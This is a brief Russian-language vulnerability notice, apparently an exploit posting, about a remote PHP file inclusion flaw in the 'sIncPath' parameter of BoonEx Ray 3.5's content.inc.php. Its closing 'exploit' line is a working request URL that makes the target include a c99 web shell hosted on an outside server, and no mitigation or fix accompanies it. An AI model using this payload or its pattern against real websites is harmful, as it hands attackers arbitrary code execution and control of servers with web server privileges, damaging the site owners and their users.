Программа: BoonEx Ray 3.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «sIncPath» сценарием content.inc.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.
Эксплоит:
http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php? sIncPath=http://rxh.freehostia.com/shells/c99in.txt?